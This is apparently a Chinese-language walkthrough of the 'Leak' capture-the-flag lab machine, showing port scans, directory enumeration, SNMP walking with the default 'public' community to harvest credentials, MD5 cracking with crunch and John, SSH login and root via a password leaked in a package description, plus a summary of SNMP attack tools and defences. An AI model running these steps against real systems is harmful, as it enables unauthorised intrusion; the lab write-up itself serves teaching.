Leak

靶机说明

QQ群:660930334

主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/tmp]
└─# nmap -sn 192.168.2.0/24                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-01 09:13 CST
Nmap scan report for 192.168.2.1
Host is up (0.00067s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00045s latency).
MAC Address: 08:00:27:1A:06:78 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.42
Host is up (0.00046s latency).
MAC Address: 08:00:27:A6:0D:F6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.23 seconds

IP地址:192.168.2.42

端口扫描

1、全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/tmp]
└─# nmap --min-rate 10000 -p- 192.168.2.42                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-01 09:13 CST
Nmap scan report for 192.168.2.42
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A6:0D:F6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.48 seconds

开放端口:22和80

2、详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/tmp]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-01 09:13 CST
Nmap scan report for 192.168.2.42
Host is up (0.013s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Kali Linux - \xE5\xAE\x89\xE5\x85\xA8\xE6\xB8\x97\xE9\x80\x8F\xE6\xB5\x8B\xE8\xAF\x95\xE5\xB9\xB3\xE5\x8F\xB0
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:A6:0D:F6 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.37 seconds

3、UDP端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kali)-[/tmp]
└─# nmap -sU --top-ports 20 192.168.2.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-01 19:55 CST
Nmap scan report for sunset.leak.dsz (192.168.2.42)
Host is up (0.00075s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   open          snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 08:00:27:A6:0D:F6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds

发现开放端口:161,SNMP服务

WEB渗透

1、80端口

访问80端口

1-目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kali)-[/tmp]
└─# gobuster dir -u http://192.168.2.42 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.42
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 15740]
/.php                 (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

没有发现其他的目录,基本上没有啥东西

2、161端口

1、SNMP信息泄露

由于161端口的服务是snmp,SNMP 服务常因配置不当而泄露大量敏感信息。
直接使用工具snmapwalk获取信息

1
2
┌──(root㉿kali)-[/tmp]
└─# snmpwalk -v 2c -c public 192.168.2.42 > 1.txt

在文件里面找到一个服务leak-service的用户名和密码:Shinozaki:ShinozakiAi

没找到利用的思路,后来去问了群主,说里面有一个域名,那找了一下,比较像域名的也只有admin@sunset.leak.dsz,由于域名不能@ ,所以域名可能是 sunset.leak.dsz

追加到hosts文件里面

1
2
┌──(root㉿kali)-[/tmp]
└─# echo "192.168.2.42 sunset.leak.dsz" >> /etc/hosts

访问sunset.leak.dsz,发现还是一样的界面

2-目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿kali)-[/tmp]
└─# gobuster dir -u http://sunset.leak.dsz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://sunset.leak.dsz
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 15740]
/manager              (Status: 301) [Size: 320] [--> http://sunset.leak.dsz/manager/]
/.html                (Status: 403) [Size: 280]
/.php                 (Status: 403) [Size: 280]
/server-status        (Status: 403) [Size: 280]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

发现存在一个目录manager

尝试进行访问,发现需要账号和密码,使用在snmp里面发现的账号密码Shinozaki:ShinozakiAi进行登录,成功进入

发现已经提示我们利用的步骤了,照着来就好了

3-John爆破

使用 crunch 生成一个以 baba 开头的8位字典

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/tmp]
└─# crunch 8 8 -t baba@@@@ -o wordlist.txt 
Crunch will now generate the following amount of data: 4112784 bytes
3 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 456976 

crunch: 100% completed generating output

使用John进行爆破

1
2
┌──(root㉿kali)-[/tmp]
└─# echo "d21715210cb6224f9ff4c075a8906fe9" > hashes.txt
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/tmp]
└─# john --format=raw-md5 --wordlist=wordlist.txt hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
babadawo         (?)     
1g 0:00:00:00 DONE (2025-07-01 19:33) 100.0g/s 5337Kp/s 5337Kc/s 5337KC/s babadaro..babadayx
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

找到密码babadawo

直接使用用户名和密码进行登录

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/tmp]
└─# ssh ai@192.168.2.42          
ai@192.168.2.42's password: 
Linux Leak 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ai@Leak:~$ id
uid=1000(ai) gid=1000(ai) groups=1000(ai)

USER FLAG

1
2
ai@Leak:~$ cat user.txt 
flag{user-13421fec-559d-11f0-a1af-5f1558743b4d}

提权

执行sudo -l,发现需要密码

1
2
3
4
5
6
7
8
9
ai@Leak:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for ai:

查看/目录下面,发现存在.bash_history

1
2
ai@Leak:~$ cat .bash_history 
leak-date

1、查看系统的软件包

查看当前系统上安装的软件包

1
2
3
ai@Leak:~$ dpkg -l | grep leak
ii  leak-date                     1.0-1                                       amd64        Simple date and time display utility
ii  liblsan0:amd64                10.2.1-6                                    amd64        LeakSanitizer -- a memory leak detector (runtime)

发现一个软件包和.bash_history里面的一样,查看详细信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ai@Leak:~$ dpkg -s leak-date
Package: leak-date
Status: install ok installed
Priority: optional
Section: utils
Installed-Size: 500
Maintainer: Security Admin <admin@leak.dsz>
Architecture: amd64
Version: 1.0-1
Description: Simple date and time display utility
 This package provides a minimal CLI utility to display
 the current system date and time. Ideal for scripts and
 system monitoring. SECURITY NOTICE: System debug token
 IMKCFRunLoopWakeUpReliable for root access.

发现最后一条提示IMKCFRunLoopWakeUpReliable for root access,这串字符IMKCFRunLoopWakeUpReliable用作root的访问

直接访问root用户

1
2
3
4
ai@Leak:~$ su root
Password: 
root@Leak:/home/ai# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

1
2
root@Leak:/home/ai# cat /root/root.txt
flag{root-357d3d08-5598-11f0-a27e-639fd7e7110b}

【总结】

1、SNMP渗透

1-SNMP渗透的常见方式

  • 利用默认社区字符串:许多设备默认有两个社区字符串“public”(只读)和“private”(读写)。攻击者可尝试使用这些默认字符串来获取设备信息,如设备型号、配置文件等。
  • 暴力破解社区字符串:通过编写脚本或使用工具,对设备的SNMP社区字符串进行暴力破解,一旦破解成功,攻击者就可能获得设备的管理权限。
  • 利用SNMP漏洞:某些设备的SNMP实现存在漏洞,如缓冲区溢出、命令注入等。攻击者可利用这些漏洞,向设备发送恶意请求,从而控制设备或获取敏感信息。
  • 信息收集与利用:通过SNMP获取设备的系统信息、接口信息、路由表等,分析这些信息以发现网络中的薄弱环节,为进一步的攻击做准备。例如,获取设备的IP地址、MAC地址、端口状态等信息,可帮助攻击者了解网络拓扑结构。

2-SNMP渗透的工具

  • snmpget:用于获取单个SNMP对象的值。例如,snmpget -v2c -c public 10.10.11.48 1.3.6.1.2.1.1.1.0可以查询设备的系统描述。
  • snmpwalk:用于获取一系列SNMP对象的值。例如,snmpwalk -v2c -c public 10.10.11.48 1.3.6.1.2.1.1可以获取设备的系统信息。
  • snmp-check:用于检查目标设备的SNMP信息,如系统信息、接口信息等。例如,snmp-check -c public 10.10.11.48可以检查目标设备的SNMP信息。
  • cisc0wn:针对开启了SNMP协议的Cisco路由器和交换机的攻击脚本,可暴力猜解community string、下载配置文件以及破解密码。
  • h3c-pt-tools:可针对华为、HP、H3C的设备进行渗透测试和审计,可使用其中的nmap脚本和msf模块进行SNMP自动化攻击。

3-防御SNMP渗透的措施

  • 更改默认社区字符串:将设备的默认社区字符串修改为复杂且唯一的字符串,避免使用默认的“public”和“private”。
  • 限制访问:通过防火墙或访问控制列表(ACL),限制对SNMP端口(UDP 161/162)的访问,只允许特定的IP地址或网络段访问。
  • 启用认证和加密:对于支持SNMP v3的设备,启用认证和加密功能,以确保SNMP通信的安全性。
  • 定期审计和监控:定期对网络设备的SNMP配置进行审计,检查是否存在安全漏洞。同时,使用监控工具对SNMP流量进行实时监控,及时发现异常行为。

【参考】

2、提权-软件包

Maze-sec
#snmp服务 #提取-dpkg
Leak
http://miao-sec.github.io/Maze-sec/Leak/
作者
Miao
发布于
2025年7月1日
许可协议
BY-MIAO